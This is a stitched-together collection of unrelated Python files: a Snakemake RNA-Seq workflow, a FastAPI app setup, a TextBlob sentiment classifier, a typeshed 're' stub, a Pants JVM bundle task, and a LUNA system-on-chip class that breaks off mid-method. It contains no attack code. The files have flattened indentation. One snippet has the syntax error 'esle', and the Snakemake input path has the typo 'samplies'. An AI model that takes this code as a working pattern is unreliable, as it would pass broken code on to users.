|
class AbstractBackend:
NAME = None
SALT = None
@classmethod
def handle(cls):
raise NotImplementedError()
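# A minimal sketch (not part of the original) of how a concrete backend might look;
# the class name, NAME/SALT values, and handle() body are illustrative assumptions.
class ExampleBackend(AbstractBackend):
    NAME = "example"
    SALT = "not-a-real-salt"

    @classmethod
    def handle(cls):
        # Concrete backends override handle() instead of raising NotImplementedError.
        return "%s handled" % cls.NAME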
|
from snakemake.utils import R
import sys
"""
Author: D. Puthier
Affiliation: AMU
Aim: A simple Snakemake workflow to process paired-end stranded RNA-Seq.
Date: Mon Nov 2 14:03:11 CET 2015
Run: snakemake -s Snakefile
Latest modification:
- todo
"""
##-----------------------------------------------##
## A set of functions
##-----------------------------------------------##
def message(mes):
sys.stderr.write("|--- " + mes + "\n")
##-----------------------------------------------##
## Working directory ##
## Adapt to your needs ##
##-----------------------------------------------##
BASE_DIR="/home/liyubing/analysis/7_snakemake/projects/"
WDIR = BASE_DIR + "t-cell_analysis"
workdir: WDIR
message("The current working directory is " + WDIR)
##--------------------------------------------------------------------------------------##
## Variables declaration
## Declaring some variables used by topHat and other tools...
## (GTF file, INDEX, chromosome length)
##--------------------------------------------------------------------------------------##
# Adapt the path to your needs
INDEX = BASE_DIR + "indexes/bowtie2/mm10/chr19"
GTF = BASE_DIR + "annotations/gtf/GRCm38.83.chr19.gtf"
CHR = BASE_DIR + "annotations/txt/chromInfo_mm10.txt"
FASTA = BASE_DIR + "indexes/bowtie2/mm10/chr19.fa"
##--------------------------------------------------------------------------------------##
## The list of samples to be processed
##--------------------------------------------------------------------------------------##
SAMPLES, = glob_wildcards("samples/raw/{smp}_R1.fq.gz")
NB_SAMPLES = len(SAMPLES)
for smp in SAMPLES:
message("Sample " + smp + " will be processed")
rule final:
input:
expand("samples/fastqc/{smp}/{smp}_R1_t_fastqc.zip", smp=SAMPLES),
"samples/cuffmerge/merged.gtf","results/diagnostic_plot/diagnostic.pdf"
rule trimming:
input: fwd="samples/raw/{smp}_R1.fq.gz", rev="samples/raw/{smp}_R2.fq.gz"
output: fwd="samples/trimmed/{smp}_R1_t.fq",
rev="samples/trimmed/{smp}_R2_t.fq",
single="samples/trimmed/{smp}_R1_singletons.fq"
message: """--- Trimming."""
shell: """
sickle pe -f {input.fwd} -r {input.rev} -l 25 -q 20 -t sanger -o {output.fwd} -p {output.rev} -s {output.single} &> {input.fwd}.log
"""
rule fastqc:
input: fwd="samples/trimmed/{smp}_R1_t.fq",
rev="samples/trimmed/{smp}_R2_t.fq"
output: fwd="samples/fastqc/{smp}/{smp}_R1_t_fastqc.zip",rev="samples/fastqc/{smp}/{smp}_R2_t_fastqc.zip"
message: """--- Quality check of raw data with Fastqc."""
shell: """
fastqc --outdir samples/fastqc/{wildcards.smp} --extract -f fastq {input.fwd} {input.rev}
"""
rule tophat:
input:fwd="samples/trimmed/{smp}_R1_t.fq",
rev="samples/trimmed/{smp}_R2_t.fq"
params: gtf=GTF, index=INDEX
output: "samples/bam/{smp}.bam"
shell: """
source activate base;set -euo pipefail;
mkdir -p samples/tophat/{wildcards.smp}
tophat2 -o samples/tophat/{wildcards.smp} -g 1 --library-type fr-firststrand -G {params.gtf} -x 1 -p 5 {params.index} {input.fwd} {input.rev} &> samples/tophat/{wildcards.smp}/run_tophat.log
cd samples/tophat/{wildcards.smp}
mv accepted_hits.bam ../../bam/{wildcards.smp}.bam
"""
rule cufflinks:
input: bam="samples/bam/{smp}.bam"
output: gtf="samples/cufflinks/{smp}/transcripts.gtf"
params: gtf=GTF
message: "--- Searching novel transcript with cufflinks."
shell: """
cufflinks -g {params.gtf} -p 5 --library-type fr-firststrand -o samples/cufflinks/{wildcards.smp} {input.bam} &> {output}.log
"""
rule cuffmerge:
input: expand("samplies/cufflinks/{smp}/transcripts.gtf", smp=SAMPLES)
output: "samples/cuffmerge/merged.gtf"
params: gtf=GTF, fa=FASTA
message: "--- Comparing transcript to the reference."
shell: """
ls -1 samples/cufflinks/*/transcripts.gtf > samples/cuffmerge/assembly.txt
source activate base;set -euo pipefail;
cuffmerge -o samples/cuffmerge -g {params.gtf} --keep-tmp -s {params.fa} -p 5 samples/cuffmerge/assembly.txt &> {output}.log
"""
rule add_gene_name_to_unknown:
input: "samples/cuffmerge/novel_transcript.gtf"
output: "samples/cuffmerge/novel_transcript_gn.gtf"
params: gtf=GTF, fa=FASTA
message: "--- Adding gene name to novel transcript."
run:
import re
        with open(input[0]) as fh_in, open(output[0], "w") as fh_out:
            for line in fh_in:
                line = line.rstrip("\n")
                if not re.search("gene_name", line):
                    gene_id = re.match('.*gene_id "(.*?)"', line).group(1)
                    fh_out.write(line + ' gene_name "' + gene_id + '";\n')
                else:
                    # Keep transcripts that already carry a gene_name unchanged.
                    fh_out.write(line + "\n")
rule merge_novel_and_known:
input: novel="samples/cuffmerge/novel_transcript_gn.gtf", known=GTF
output: "samples/new_annotation/all_transcripts.gtf"
params: gtf=GTF, fa=FASTA
message: "--- Merging known and novel transcripts."
shell: """
cat {input.novel} {input.known} > {output}
"""
rule quantification_with_featureCounts:
input: novel="samples/new_annotation/all_transcripts.gtf", bam=expand("samples/bam/{smp}.bam", smp=SAMPLES)
output: "results/counts/gene_counts.txt", "results/counts/gene_counts_mini.txt"
shell: """
featureCounts -p -s 2 -T 15 -t exon -g gene_id -a {input.novel} -o {output[0]} {input.bam} &> {output[0]}.log
cut -f 1,7- {output[0]}| awk 'NR > 1' | awk '{{gsub("samples/bam/","",$0); print}}' > {output[1]}
"""
rule diagnostic_plot:
input: "results/counts/gene_counts_mini.txt"
output: "results/diagnostic_plot/diagnostic.pdf"
run:
R("""
system("source activate base;set -euo pipefail;")
dir.create("results/diagnostic_plot")
data <- read.table("{input}",
sep="\t",
header=T,
row.names=1)
data <- data[rowSums(data) > 0, ]
data <- log2(data + 1)
pdf("{output}")
dev.null <- apply(data, 2, hist, border="white", col="blue")
boxplot(data, color="blue", pch=16)
pairs(data, pch=".", col="blue")
dev.off()
cat("etc...")
""")
|
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from .db import models
from .db.database import engine
from .routers import job, employee
models.Base.metadata.create_all(bind=engine)
app = FastAPI()
origins = [
"http://localhost",
"http://localhost:3000",
]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.include_router(job.router)
app.include_router(employee.router)
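# The .routers.job and .routers.employee modules are not shown in this file; a hedged
# sketch of what one of them might contain (prefix, tag, and handler are assumptions):
#
# from fastapi import APIRouter
#
# router = APIRouter(prefix="/jobs", tags=["jobs"])
#
# @router.get("/")
# def list_jobs():
#     return []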
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from textblob.classifiers import NaiveBayesClassifier
import pickle
import os.path
import hashlib
from textblob import TextBlob
import json
DEBUG=True
trained_classifier = 'nb.classifier'
def loadSet(path, polarity):
sentences = []
with open(path) as f:
for line in f:
sentences.append((line, polarity))
return sentences
def storeClassifier(classifier):
    with open(trained_classifier, 'wb') as handle:
        pickle.dump(classifier, handle)
def loadClassifier():
with open(trained_classifier, 'rb') as handle:
return pickle.load(handle)
test = [
('Ohne Köttbullar seid ihr nichts!', 'neg'),
('Bitte um Erklärung !!!', 'neg'),
('ich bin enttäuscht', 'neg'),
('IKEA ich liebe dich :D ♥', 'pos'),
('Ein tolles blau gelbes Bild...', 'pos'),
('Besser als im Kino hier :D', 'pos')
]
train = loadSet('negativ.txt', 'neg') + loadSet('positiv.txt', 'pos')
if os.path.isfile(trained_classifier) and not DEBUG:
nb_cl = loadClassifier()
else:
    nb_cl = NaiveBayesClassifier(train)  # train a fresh classifier on the positive/negative sets
storeClassifier(nb_cl)
print(nb_cl.accuracy(test))
nb_cl.show_informative_features(30)
for i in test:
blob = TextBlob(i[0], classifier=nb_cl)
print(i)
print(blob.classify())
#test_sentence = "ich mag sie wirklich über alles"
#print ("NaiveBayes: %d,%d" % (nb_cl.prob_classify(test_sentence).prob("positive"),nb_cl.accuracy(test)) )
|
import enum
import sre_compile
import sys
from _typeshed import ReadableBuffer
from collections.abc import Callable, Iterator
from sre_constants import error as error
from typing import Any, AnyStr, Match as Match, Pattern as Pattern, overload
from typing_extensions import TypeAlias
__all__ = [
"match",
"fullmatch",
"search",
"sub",
"subn",
"split",
"findall",
"finditer",
"compile",
"purge",
"template",
"escape",
"error",
"A",
"I",
"L",
"M",
"S",
"X",
"U",
"ASCII",
"IGNORECASE",
"LOCALE",
"MULTILINE",
"DOTALL",
"VERBOSE",
"UNICODE",
"Match",
"Pattern",
]
if sys.version_info >= (3, 11):
__all__ += ["NOFLAG", "RegexFlag"]
# ----- re variables and constants -----
class RegexFlag(enum.IntFlag):
A = sre_compile.SRE_FLAG_ASCII
ASCII = A
DEBUG = sre_compile.SRE_FLAG_DEBUG
I = sre_compile.SRE_FLAG_IGNORECASE
IGNORECASE = I
L = sre_compile.SRE_FLAG_LOCALE
LOCALE = L
M = sre_compile.SRE_FLAG_MULTILINE
MULTILINE = M
S = sre_compile.SRE_FLAG_DOTALL
DOTALL = S
X = sre_compile.SRE_FLAG_VERBOSE
VERBOSE = X
U = sre_compile.SRE_FLAG_UNICODE
UNICODE = U
T = sre_compile.SRE_FLAG_TEMPLATE
TEMPLATE = T
if sys.version_info >= (3, 11):
NOFLAG: int
A = RegexFlag.A
ASCII = RegexFlag.ASCII
DEBUG = RegexFlag.DEBUG
I = RegexFlag.I
IGNORECASE = RegexFlag.IGNORECASE
L = RegexFlag.L
LOCALE = RegexFlag.LOCALE
M = RegexFlag.M
MULTILINE = RegexFlag.MULTILINE
S = RegexFlag.S
DOTALL = RegexFlag.DOTALL
X = RegexFlag.X
VERBOSE = RegexFlag.VERBOSE
U = RegexFlag.U
UNICODE = RegexFlag.UNICODE
T = RegexFlag.T
TEMPLATE = RegexFlag.TEMPLATE
if sys.version_info >= (3, 11):
NOFLAG = RegexFlag.NOFLAG
_FlagsType: TypeAlias = int | RegexFlag
# Type-wise the compile() overloads are unnecessary, they could also be modeled using
# unions in the parameter types. However mypy has a bug regarding TypeVar
# constraints (https://github.com/python/mypy/issues/11880),
# which limits us here because AnyStr is a constrained TypeVar.
# pattern arguments do *not* accept arbitrary buffers such as bytearray,
# because the pattern must be hashable.
@overload
def compile(pattern: AnyStr, flags: _FlagsType = ...) -> Pattern[AnyStr]: ...
@overload
def compile(pattern: Pattern[AnyStr], flags: _FlagsType = ...) -> Pattern[AnyStr]: ...
@overload
def search(pattern: str | Pattern[str], string: str, flags: _FlagsType = ...) -> Match[str] | None: ...
@overload
def search(pattern: bytes | Pattern[bytes], string: ReadableBuffer, flags: _FlagsType = ...) -> Match[bytes] | None: ...
@overload
def match(pattern: str | Pattern[str], string: str, flags: _FlagsType = ...) -> Match[str] | None: ...
@overload
def match(pattern: bytes | Pattern[bytes], string: ReadableBuffer, flags: _FlagsType = ...) -> Match[bytes] | None: ...
@overload
def fullmatch(pattern: str | Pattern[str], string: str, flags: _FlagsType = ...) -> Match[str] | None: ...
@overload
def fullmatch(pattern: bytes | Pattern[bytes], string: ReadableBuffer, flags: _FlagsType = ...) -> Match[bytes] | None: ...
@overload
def split(pattern: str | Pattern[str], string: str, maxsplit: int = ..., flags: _FlagsType = ...) -> list[str | Any]: ...
@overload
def split(
pattern: bytes | Pattern[bytes], string: ReadableBuffer, maxsplit: int = ..., flags: _FlagsType = ...
) -> list[bytes | Any]: ...
@overload
def findall(pattern: str | Pattern[str], string: str, flags: _FlagsType = ...) -> list[Any]: ...
@overload
def findall(pattern: bytes | Pattern[bytes], string: ReadableBuffer, flags: _FlagsType = ...) -> list[Any]: ...
@overload
def finditer(pattern: str | Pattern[str], string: str, flags: _FlagsType = ...) -> Iterator[Match[str]]: ...
@overload
def finditer(pattern: bytes | Pattern[bytes], string: ReadableBuffer, flags: _FlagsType = ...) -> Iterator[Match[bytes]]: ...
@overload
def sub(
pattern: str | Pattern[str], repl: str | Callable[[Match[str]], str], string: str, count: int = ..., flags: _FlagsType = ...
) -> str: ...
@overload
def sub(
pattern: bytes | Pattern[bytes],
repl: ReadableBuffer | Callable[[Match[bytes]], ReadableBuffer],
string: ReadableBuffer,
count: int = ...,
flags: _FlagsType = ...,
) -> bytes: ...
@overload
def subn(
pattern: str | Pattern[str], repl: str | Callable[[Match[str]], str], string: str, count: int = ..., flags: _FlagsType = ...
) -> tuple[str, int]: ...
@overload
def subn(
pattern: bytes | Pattern[bytes],
repl: ReadableBuffer | Callable[[Match[bytes]], ReadableBuffer],
string: ReadableBuffer,
count: int = ...,
flags: _FlagsType = ...,
) -> tuple[bytes, int]: ...
def escape(pattern: AnyStr) -> AnyStr: ...
def purge() -> None: ...
def template(pattern: AnyStr | Pattern[AnyStr], flags: _FlagsType = ...) -> Pattern[AnyStr]: ...
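# Usage illustration (not part of the stub): the paired overloads above mean that str
# patterns produce str results and bytes patterns produce bytes results, e.g.:
#   re.search(r"\d+", "order 42")       -> Match[str] | None
#   re.search(rb"\d+", b"order 42")     -> Match[bytes] | None
#   re.sub(r"\s+", " ", "a  b\tc")      -> "a b c"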
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from twitter.common.collections import OrderedSet
from pants.backend.jvm.targets.jvm_app import JvmApp
from pants.backend.jvm.targets.jvm_binary import JvmBinary
from pants.backend.jvm.tasks.classpath_util import ClasspathUtil
from pants.backend.jvm.tasks.jvm_binary_task import JvmBinaryTask
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TaskError
from pants.build_graph.target_scopes import Scopes
from pants.fs import archive
from pants.util.dirutil import safe_mkdir
class BundleCreate(JvmBinaryTask):
"""
:API: public
"""
# Directory for both internal and external libraries.
LIBS_DIR = 'libs'
_target_closure_kwargs = dict(include_scopes=Scopes.JVM_RUNTIME_SCOPES, respect_intransitive=True)
@classmethod
def register_options(cls, register):
super(BundleCreate, cls).register_options(register)
register('--deployjar', type=bool,
fingerprint=True,
help="Pack all 3rdparty and internal jar classfiles into a single deployjar in "
"the bundle's root dir. If unset, all jars will go into the bundle's libs "
"directory, the root will only contain a synthetic jar with its manifest's "
"Class-Path set to those jars.")
register('--archive', choices=list(archive.TYPE_NAMES),
fingerprint=True,
help='Create an archive of this type from the bundle.')
register('--archive-prefix', type=bool,
fingerprint=True,
help='If --archive is specified, prefix archive with target basename or a unique '
'identifier as determined by --use-basename-prefix.')
# `target.id` ensures global uniqueness, this flag is provided primarily for
# backward compatibility.
register('--use-basename-prefix', type=bool,
help='Use target basename to prefix bundle folder or archive; otherwise a unique '
'identifier derived from target will be used.')
@classmethod
def product_types(cls):
return ['jvm_bundles']
class App(object):
"""A uniform interface to an app."""
@staticmethod
def is_app(target):
return isinstance(target, (JvmApp, JvmBinary))
def __init__(self, target, use_basename_prefix=False):
assert self.is_app(target), '{} is not a valid app target'.format(target)
self.address = target.address
self.binary = target if isinstance(target, JvmBinary) else target.binary
self.bundles = [] if isinstance(target, JvmBinary) else target.payload.bundles
self.basename = target.basename if use_basename_prefix else target.id
self.target = target
@property
def cache_target_dirs(self):
return True
def execute(self):
archiver_type = self.get_options().archive
archiver = archive.archiver(archiver_type) if archiver_type else None
if self.get_options().use_basename_prefix:
# NB(peiyu) This special casing is confusing especially given we already fail
# when duplicate basenames are detected. It's added because of the existing
# user experience. Turns out a `jvm_app` that depends on another `jvm_binary`
# of the same basename is fairly common. In this case, using just
# `target_roots` instead of all transitive targets will reduce the chance users
# see their bundle command fail due to basename conflicts. We should eventually
# get rid of this special case.
targets_to_bundle = self.context.target_roots
else:
targets_to_bundle = self.context.targets()
apps = [self.App(target, use_basename_prefix=self.get_options().use_basename_prefix)
for target in targets_to_bundle if self.App.is_app(target)]
if self.get_options().use_basename_prefix:
self.check_basename_conflicts(apps)
# NB(peiyu): performance hack to convert loose directories in classpath into jars. This is
# more efficient than loading them as individual files.
runtime_classpath = self.context.products.get_data('runtime_classpath')
targets_to_consolidate = self.find_consolidate_classpath_candidates(
runtime_classpath,
self.context.targets(**self._target_closure_kwargs),
)
self.consolidate_classpath(targets_to_consolidate, runtime_classpath)
for app in apps:
basedir = self.bundle(app)
# NB(Eric Ayers): Note that this product is not housed/controlled under .pants.d/ Since
# the bundle is re-created every time, this shouldn't cause a problem, but if we ever
# expect the product to be cached, a user running an 'rm' on the dist/ directory could
# cause inconsistencies.
jvm_bundles_product = self.context.products.get('jvm_bundles')
jvm_bundles_product.add(app.target, os.path.dirname(basedir)).append(os.path.basename(basedir))
if archiver:
archivepath = archiver.create(
basedir,
self.get_options().pants_distdir,
app.basename,
prefix=app.basename if self.get_options().archive_prefix else None
)
self.context.log.info('created {}'.format(os.path.relpath(archivepath, get_buildroot())))
class BasenameConflictError(TaskError):
"""Indicates the same basename is used by two targets."""
def bundle(self, app):
"""Create a self-contained application bundle.
The bundle will contain the target classes, dependencies and resources.
"""
assert(isinstance(app, BundleCreate.App))
bundle_dir = os.path.join(self.get_options().pants_distdir, '{}-bundle'.format(app.basename))
self.context.log.info('creating {}'.format(os.path.relpath(bundle_dir, get_buildroot())))
safe_mkdir(bundle_dir, clean=True)
classpath = OrderedSet()
# Create symlinks for both internal and external dependencies under `lib_dir`. This is
# only needed when not creating a deployjar
lib_dir = os.path.join(bundle_dir, self.LIBS_DIR)
if not self.get_options().deployjar:
os.mkdir(lib_dir)
runtime_classpath = self.context.products.get_data('runtime_classpath')
classpath.update(ClasspathUtil.create_canonical_classpath(
runtime_classpath,
app.target.closure(bfs=True, **self._target_closure_kwargs),
lib_dir,
internal_classpath_only=False,
excludes=app.binary.deploy_excludes,
))
bundle_jar = os.path.join(bundle_dir, '{}.jar'.format(app.binary.basename))
with self.monolithic_jar(app.binary, bundle_jar,
manifest_classpath=classpath) as jar:
self.add_main_manifest_entry(jar, app.binary)
# Make classpath complete by adding the monolithic jar.
classpath.update([jar.path])
if app.binary.shading_rules:
for jar_path in classpath:
# In case `jar_path` is a symlink, this is still safe, shaded jar will overwrite jar_path,
# original file `jar_path` linked to remains untouched.
# TODO run in parallel to speed up
self.shade_jar(shading_rules=app.binary.shading_rules, jar_path=jar_path)
for bundle in app.bundles:
for path, relpath in bundle.filemap.items():
bundle_path = os.path.join(bundle_dir, relpath)
if not os.path.exists(path):
raise TaskError('Given path: {} does not exist in target {}'.format(
path, app.address.spec))
safe_mkdir(os.path.dirname(bundle_path))
os.symlink(path, bundle_path)
return bundle_dir
def consolidate_classpath(self, targets, classpath_products):
"""Convert loose directories in classpath_products into jars. """
with self.invalidated(targets=targets, invalidate_dependents=True) as invalidation:
for vt in invalidation.all_vts:
entries = classpath_products.get_internal_classpath_entries_for_targets([vt.target])
for index, (conf, entry) in enumerate(entries):
if ClasspathUtil.is_dir(entry.path):
jarpath = os.path.join(vt.results_dir, 'output-{}.jar'.format(index))
# regenerate artifact for invalid vts
if not vt.valid:
with self.open_jar(jarpath, overwrite=True, compressed=False) as jar:
jar.write(entry.path)
# replace directory classpath entry with its jarpath
classpath_products.remove_for_target(vt.target, [(conf, entry.path)])
classpath_products.add_for_target(vt.target, [(conf, jarpath)])
def find_consolidate_classpath_candidates(self, classpath_products, targets):
targets_with_directory_in_classpath = []
for target in targets:
entries = classpath_products.get_internal_classpath_entries_for_targets([target])
for conf, entry in entries:
if ClasspathUtil.is_dir(entry.path):
targets_with_directory_in_classpath.append(target)
break
return targets_with_directory_in_classpath
def check_basename_conflicts(self, apps):
"""Apps' basenames are used as bundle directory names. Ensure they are all unique."""
basename_seen = {}
for app in apps:
if app.basename in basename_seen:
raise self.BasenameConflictError('Basename must be unique, found two targets use '
"the same basename: {}'\n\t{} and \n\t{}"
.format(app.basename,
basename_seen[app.basename].address.spec,
app.target.address.spec))
basename_seen[app.basename] = app.target
|
x,y=15,45
res=x if x<y esle y
print(res)
|
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
""" Simple SoC abstraction for LUNA examples."""
import os
import datetime
import logging
from amaranth import Elaboratable, Module
from amaranth_soc import wishbone
from amaranth_stdio.serial import AsyncSerial
from lambdasoc.soc.cpu import CPUSoC
from lambdasoc.cpu.minerva import MinervaCPU
from lambdasoc.periph.intc import GenericInterruptController
from lambdasoc.periph.serial import AsyncSerialPeripheral
from lambdasoc.periph.sram import SRAMPeripheral
from lambdasoc.periph.timer import TimerPeripheral
from .memory import WishboneRAM, WishboneROM
from ..utils.cdc import synchronize
class SimpleSoC(CPUSoC, Elaboratable):
""" Class used for building simple, example system-on-a-chip architectures.
Intended to facilitate demonstrations (and very simple USB devices) by providing
a wrapper that can be updated as the Amaranth-based-SoC landscape changes. Hopefully,
this will eventually be filled by e.g. Amaranth-compatible-LiteX. :)
    SimpleSoC devices integrate:
- A simple riscv32i processor.
- One or more read-only or read-write memories.
- A number of amaranth-soc peripherals.
The current implementation uses a single, 32-bit wide Wishbone bus
as the system's backend; and uses lambdasoc as its backing technology.
This is subject to change.
"""
BUS_ADDRESS_WIDTH = 30
def __init__(self, clock_frequency=int(60e6)):
"""
Parameters:
            clock_frequency -- The frequency of our `sync` domain, in Hz.
"""
self.sync_clk_freq = clock_frequency
self._main_rom = None
self._main_ram = None
self._uart_baud = None
# Keep track of our created peripherals and interrupts.
self._submodules = []
self._irqs = {}
self._next_irq_index = 0
# By default, don't attach any debug hardware; or build a BIOS.
self._auto_debug = False
self._build_bios = False
#
# Create our core hardware.
# We'll create this hardware early, so it can be used for e.g. code generation without
# fully elaborating our design.
#
# Create our CPU.
self.cpu = MinervaCPU(with_debug=False)
# Create our interrupt controller.
self.intc = GenericInterruptController(width=32)
# Create our bus decoder
self.bus_decoder = wishbone.Decoder(addr_width=30, data_width=32, granularity=8, features={"cti", "bte"})
# Things we don't have but lambdasoc's jinja2 templates expect
self.sdram = None
self.ethmac = None
@property
def memory_map(self):
return self.bus_decoder.bus.memory_map
def add_rom(self, data, size, addr=0, is_main_rom=True):
""" Creates a simple ROM and adds it to the design.
Parameters:
data -- The data to fill the relevant ROM.
size -- The size for the rom that should be created.
addr -- The address at which the ROM should reside.
"""
# Figure out how many address bits we'll need to address the given memory size.
addr_width = (size - 1).bit_length()
rom = WishboneROM(data, addr_width=addr_width)
if self._main_rom is None and is_main_rom:
self._main_rom = rom
return self.add_peripheral(rom, addr=addr)
@property
def mainram(self):
return self.sram
@property
def sram(self):
return self._main_ram
def add_ram(self, size: int, addr: int = None, is_main_mem: bool = True):
""" Creates a simple RAM and adds it to our design.
Parameters:
size -- The size of the RAM, in bytes. Will be rounded up to the nearest power of two.
addr -- The address at which to place the RAM.
"""
# Figure out how many address bits we'll need to address the given memory size.
addr_width = (size - 1).bit_length()
# ... and add it as a peripheral.
ram = WishboneRAM(addr_width=addr_width)
if self._main_ram is None and is_main_mem:
self._main_ram = ram
return self.add_peripheral(ram, addr=addr)
def add_peripheral(self, p, *, as_submodule=True, **kwargs):
""" Adds a peripheral to the SoC.
For now, this is identical to adding a peripheral to the SoC's wishbone bus.
For convenience, returns the peripheral provided.
"""
# Add the peripheral to our bus...
interface = getattr(p, 'bus')
self.bus_decoder.add(interface, **kwargs)
# ... add its IRQs to the IRQ controller...
try:
irq_line = getattr(p, 'irq')
self.intc.add_irq(irq_line, self._next_irq_index)
self._irqs[self._next_irq_index] = p
self._next_irq_index += 1
except (AttributeError, NotImplementedError):
# If the object has no associated IRQs, continue anyway.
# This allows us to add devices with only Wishbone interfaces to our SoC.
pass
# ... and keep track of it for later.
if as_submodule:
self._submodules.append(p)
return p
def add_debug_port(self):
""" Adds an automatically-connected Debug port to our SoC. """
self._auto_debug = True
def add_bios_and_peripherals(self, uart_pins, uart_baud_rate=115200, fixed_addresses=False):
""" Adds a simple BIOS that allows loading firmware, and the requisite peripherals.
Automatically adds the following peripherals:
self.uart -- An AsyncSerialPeripheral used for serial I/O.
self.timer -- A TimerPeripheral used for BIOS timing.
self.bootrom -- A ROM memory used for the BIOS.
self.scratchpad -- The RAM used by the BIOS; not typically the program RAM.
Parameters:
uart_pins -- The UARTResource to be used for UART communications; or an equivalent record.
uart_baud_rate -- The baud rate to be used by the BIOS' uart.
"""
self._build_bios = True
self._uart_baud = uart_baud_rate
# Add our RAM and ROM.
# Note that these names are from CPUSoC, and thus must not be changed.
#
# Here, we're using SRAMPeripherals instead of our more flexible ones,
# as that's what the lambdasoc BIOS expects. These are effectively internal.
#
addr = 0x0000_0000 if fixed_addresses else None
self.bootrom = SRAMPeripheral(size=0x4000, writable=False)
self.add_peripheral(self.bootrom, addr=addr)
addr = 0x0001_0000 if fixed_addresses else None
self.scratchpad = SRAMPeripheral(size=0x1000)
self.add_peripheral(self.scratchpad, addr=addr)
# Add our UART and Timer.
# Again, names are fixed.
addr = 0x0002_0000 if fixed_addresses else None
self.timer = TimerPeripheral(width=32)
self.add_peripheral(self.timer, addr=addr)
addr = 0x0003_0000 if fixed_addresses else None
uart_core = AsyncSerial(
data_bits = 8,
divisor = int(self.sync_clk_freq // uart_baud_rate),
pins = uart_pins,
)
self.uart = AsyncSerialPeripheral(core=uart_core)
self.add_peripheral(self.uart, addr=addr)
def elaborate(self, platform):
m = Module()
# Add our core CPU, and create its main system bus.
# Note that our default implementation uses a single bus for code and data,
# so this is both the instruction bus (ibus) and data bus (dbus).
m.submodules.cpu = self.cpu
m.submodules.bus = self.bus_decoder
# Create a basic programmable interrupt controller for our CPU.
m.submodules.pic = self.intc
# Add each of our peripherals to the bus.
for peripheral in self._submodules:
m.submodules += peripheral
# Merge the CPU's data and instruction busses. This essentially means taking the two
# separate bus masters (the CPU ibus master and the CPU dbus master), and connecting them
# to an arbiter, so they both share use of the single bus.
# Create the arbiter around our main bus...
m.submodules.bus_arbiter = arbiter = wishbone.Arbiter(addr_width=30, data_width=32, granularity=8, features={"cti", "bte"})
m.d.comb += arbiter.bus.connect(self.bus_decoder.bus)
# ... and connect it to the CPU instruction and data busses.
arbiter.add(self.cpu.ibus)
arbiter.add(self.cpu.dbus)
# Connect up our CPU interrupt lines.
m.d.comb += self.cpu.ip.eq(self.intc.ip)
# If we're automatically creating a debug connection, do so.
if self._auto_debug:
m.d.comb += [
self.cpu._cpu.jtag.tck .eq(synchronize(m, platform.request("user_io", 0, dir="i").i)),
self.cpu._cpu.jtag.tms .eq(synchronize(m, platform.request("user_io", 1, dir="i").i)),
self.cpu._cpu.jtag.tdi .eq(synchronize(m, platform.request("user_io", 2, dir="i").i)),
platform.request("user_io", 3, dir="o").o .eq(self.cpu._cpu.jtag.tdo)
]
return m
def resources(self, omit_bios_mem=True):
""" Creates an iterator over each of the device's addressable resources.
Yields (resource, address, size) for each resource.
Parameters:
omit_bios_mem -- If True, BIOS-related memories are skipped when generating our
resource listings. This hides BIOS resources from the application.
"""
# Grab the memory map for this SoC...
memory_map = self.bus_decoder.bus.memory_map
# ... find each addressable peripheral...
window: amaranth_soc.memory.MemoryMap
for window, (window_start, _end, _granularity) in memory_map.windows():
resources = window.all_resources()
# ... find the peripheral's resources...
resource_info: amaranth_soc.memory.ResourceInfo
for resource_info in resources:
resource = resource_info.resource
register_offset = resource_info.start
register_end_offset = resource_info.end
_local_granularity = resource_info.width
if self._build_bios and omit_bios_mem:
# If we're omitting bios resources, skip the BIOS ram/rom.
if (self.scratchpad._mem is resource) or (self.bootrom._mem is resource):
continue
# ... and extract the peripheral's range/vitals...
size = register_end_offset - register_offset
yield window, resource, window_start + register_offset, size
def build(self, name=None, build_dir="build"):
""" Builds any internal artifacts necessary to create our CPU.
This is usually used for e.g. building our BIOS.
        Parameters:
name -- The name for the SoC design.
build_dir -- The directory where our main Amaranth build is being performed.
We'll build in a subdirectory of it.
"""
# If we're building a BIOS, let our superclass build a BIOS for us.
if self._build_bios:
logging.info("Building SoC BIOS...")
super().build(name=name, build_dir=os.path.join(build_dir, 'soc'), do_build=True, do_init=True)
logging.info("BIOS build complete. Continuing with SoC build.")
self.log_resources()
def _range_for_peripheral(self, target_peripheral):
""" Returns size information for the given peripheral.
Returns:
addr, size -- if the given size is known; or
None, None if not
"""
# Grab the memory map for this SoC...
memory_map = self.bus_decoder.bus.memory_map
# Search our memory map for the target peripheral.
resource_info: amaranth_soc.memory.ResourceInfo
for resource_info in memory_map.all_resources():
            if resource_info.name[0] == target_peripheral.name:
return resource_info.start, (resource_info.end - resource_info.start)
return None, None
def _emit_minerva_basics(self, emit):
""" Emits the standard Minerva RISC-V CSR functionality.
Parameters
----------
emit: callable(str)
The function used to print the code lines to the output stream.
"""
emit("#ifndef read_csr")
emit("#define read_csr(reg) ({ unsigned long __tmp; \\")
emit(" asm volatile (\"csrr %0, \" #reg : \"=r\"(__tmp)); \\")
emit(" __tmp; })")
emit("#endif")
emit("")
emit("#ifndef write_csr")
emit("#define write_csr(reg, val) ({ \\")
emit(" asm volatile (\"csrw \" #reg \", %0\" :: \"rK\"(val)); })")
emit("#endif")
emit("")
emit("#ifndef set_csr")
emit("#define set_csr(reg, bit) ({ unsigned long __tmp; \\")
emit(" asm volatile (\"csrrs %0, \" #reg \", %1\" : \"=r\"(__tmp) : \"rK\"(bit)); \\")
emit(" __tmp; })")
emit("#endif")
emit("")
emit("#ifndef clear_csr")
emit("#define clear_csr(reg, bit) ({ unsigned long __tmp; \\")
emit(" asm volatile (\"csrrc %0, \" #reg \", %1\" : \"=r\"(__tmp) : \"rK\"(bit)); \\")
emit(" __tmp; })")
emit("#endif")
emit("")
emit("#ifndef MSTATUS_MIE")
emit("#define MSTATUS_MIE 0x00000008")
emit("#endif")
emit("")
emit("//")
emit("// Minerva headers")
emit("//")
emit("")
